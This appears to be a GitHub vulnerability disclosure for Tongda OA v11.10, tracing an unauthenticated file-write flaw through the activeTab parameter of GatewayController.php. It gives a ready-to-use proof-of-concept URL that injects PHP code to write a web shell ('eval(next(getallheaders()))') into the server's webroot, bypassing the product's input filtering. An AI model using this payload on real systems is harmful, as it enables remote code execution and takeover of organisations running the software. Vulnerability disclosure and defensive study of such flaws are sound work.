Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Tongda OA v11.10 has unauthorized arbitrary file upload vulnerability

official website:https://www.tongda2000.com/

version:v11.10

  1. The actionGetdata() method exists in the code general\appbuilder\modules\portal\controllers\GatewayController.php, where the activeTab parameter is controllable. In line 2018 the activeTab argument is in the GetData method.

WPS图片(1)

In the GetData() method, query the id argument by findall to see if the array exists, and if the queried id does, enter the if statement on line 21. So the $attribute argument in line 38 is controllable, causing the array to be closed and thus written to the file via fwrite().

WPS图片(2)

  1. The vulnerability reappears

poc

http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage

WPS图片(3)

Write php files with fwrite(fopen()) through array closure, and bypass global filtering with no parameter.

<? php eval(next(getallheaders()));

WPS图片(4)

Write the 2.php file with no argument, and the file contents are as follows.

WPS图片(5)

WPS图片(6)